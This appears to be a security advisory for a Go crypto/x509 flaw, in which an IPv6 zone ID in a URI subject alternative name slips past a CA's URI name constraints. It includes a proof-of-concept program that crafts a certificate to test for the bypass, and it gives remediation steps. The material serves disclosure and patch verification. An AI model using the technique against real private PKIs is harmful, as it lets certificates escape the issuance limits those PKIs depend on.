Golang crypto/x509 Package URI Name Constraint Bypass Vulnerability via IPv6 Zone IDs

Vulnerability

A vulnerability exists in the Go programming language's crypto/x509 package. Affected releases are every version from 1.10-beta1 up to (but not including) 1.22.11, the 1.23 series before 1.23.5, and the 1.24 pre-releases before 1.24.0-rc.2. When a CA in a chain carries a URI name constraint, a certificate whose URI subject alternative name has an IPv6 address with a zone ID as its host (for example https://[fe80::1%25eth0]:443/) can incorrectly satisfy that constraint. RFC 5280 requires a URI whose host is an IP address to be rejected outright when URI constraints apply, but the zone-bearing literal was not recognised as an IP address and was instead compared against the permitted domain suffixes as if it were a hostname. URI subject alternative names and URI name constraints are not permitted in the Web PKI, so this issue affects private PKIs that use them.
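The program below is an added worked example for this advisory; it is not taken from the Go source tree or from the advisory itself. Two small helpers, isIPLiteralPreFix and isIPLiteralFixed, model the affected and the patched IP-literal test (net.ParseIP versus netip.ParseAddr) so the difference can be seen on any Go version. The program then builds a private root constrained to the URI domain .example.com and verifies a leaf carrying the URI SAN https://[::1%25.example.com]:8080/ with the running toolchain's crypto/x509. The helper names, the root and leaf subject names and the sample URIs are assumptions made for the illustration. On a patched Go (1.22.11, 1.23.5, 1.24.0-rc.2 or later) the constrained verification of the zone-ID URI fails; on an affected release it succeeds, which is the bypass.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"net"
	"net/netip"
	"net/url"
	"strings"
	"time"
)

// must panics on setup errors (key generation, issuance); only Verify's result is returned.
func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}

// constraintHost returns the host a URI name constraint is matched against,
// using the same split rule crypto/x509 applies: strip the port unless the host
// is a bare bracketed literal. url.Parse has already unescaped "%25" to "%".
func constraintHost(u *url.URL) (string, error) {
	host := u.Host
	if strings.Contains(host, ":") && !strings.HasSuffix(host, "]") {
		h, _, err := net.SplitHostPort(host)
		if err != nil {
			return "", err
		}
		host = h
	}
	return host, nil
}

// isIPLiteralPreFix models the affected test (an illustration, not the stdlib
// source): net.ParseIP rejects any address carrying a zone ID, so "::1%.example.com"
// is not seen as an IP and falls through to domain matching, where it satisfies ".example.com".
func isIPLiteralPreFix(host string) bool {
	return net.ParseIP(host) != nil || (strings.HasPrefix(host, "[") && strings.HasSuffix(host, "]"))
}

// isIPLiteralFixed models the patched test: netip.ParseAddr accepts a zone
// suffix, so the zoned literal is classified as an IP and rejected outright.
func isIPLiteralFixed(host string) bool {
	_, err := netip.ParseAddr(host)
	return err == nil || (strings.HasPrefix(host, "[") && strings.HasSuffix(host, "]"))
}

// verifyLeafWithURI issues a leaf whose only SAN is uriSAN under a fresh
// self-signed root that permits URIs only below permittedDomain, then runs
// chain verification with the running Go's crypto/x509. nil means accepted.
func verifyLeafWithURI(permittedDomain, uriSAN string) error {
	rootKey := must(ecdsa.GenerateKey(elliptic.P256(), rand.Reader))
	leafKey := must(ecdsa.GenerateKey(elliptic.P256(), rand.Reader))
	now := time.Now()
	rootTmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: "Constrained Private Root"}, // assumed name
		NotBefore:             now.Add(-time.Hour),
		NotAfter:              now.Add(24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign,
		PermittedURIDomains:   []string{permittedDomain},
	}
	root := must(x509.ParseCertificate(must(x509.CreateCertificate(
		rand.Reader, rootTmpl, rootTmpl, &rootKey.PublicKey, rootKey))))
	leafTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(2),
		Subject:      pkix.Name{CommonName: "leaf"}, // assumed name
		NotBefore:    now.Add(-time.Hour),
		NotAfter:     now.Add(time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
		URIs:         []*url.URL{must(url.Parse(uriSAN))},
	}
	leaf := must(x509.ParseCertificate(must(x509.CreateCertificate(
		rand.Reader, leafTmpl, root, &leafKey.PublicKey, rootKey))))
	roots := x509.NewCertPool()
	roots.AddCert(root)
	_, err := leaf.Verify(x509.VerifyOptions{Roots: roots})
	return err
}

func main() {
	// Constructed sample SANs: one inside the permitted tree, one zoned IPv6 literal.
	for _, san := range []string{"https://svc.example.com/", "https://[::1%25.example.com]:8080/"} {
		host, _ := constraintHost(must(url.Parse(san)))
		fmt.Printf("%-36s host=%q preFixIP=%-5v fixedIP=%-5v verify=%v\n", san, host,
			isIPLiteralPreFix(host), isIPLiteralFixed(host), verifyLeafWithURI(".example.com", san))
	}
}
```

The zone ID is the attacker-controlled part: because the zone may contain dots, a literal such as ::1%.example.com ends in the labels "example" and "com", which is exactly what a permitted suffix of .example.com checks for once the IP-literal test has been skipped. Running the program on a patched toolchain prints a non-nil verify error for the second SAN; the same program on an affected toolchain prints verify=<nil>, which is a quick way to confirm whether a deployed binary was built with a fixed Go.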

Impact

A certificate issued beneath a CA that is restricted to particular URI domains could carry a URI subject alternative name outside that restriction and still pass chain verification in crypto/x509, and therefore in packages built on it such as crypto/tls. A private PKI that relies on URI name constraints to limit what a CA in the chain may issue loses that guarantee. Exploitation requires a certificate that chains to a trusted root through a CA carrying URI name constraints; chains without URI name constraints are not affected.

Remediation

Upgrade to Go 1.22.11, 1.23.5, or 1.24.0-rc.2 (or any later release), all of which include the fix. Instructions for downloading these versions are available on the Go website. Because the fix is in the standard library, every affected binary must be rebuilt with a patched toolchain and redeployed; updating the toolchain alone does not fix executables that have already been built. govulncheck can report which modules and binaries reach the affected crypto/x509 code.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread          5.4
impact          3.1
exploitability  5.3
remediation     0.0
relevance       0.0
threat          3.2
urgency         2.9
incentive       1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.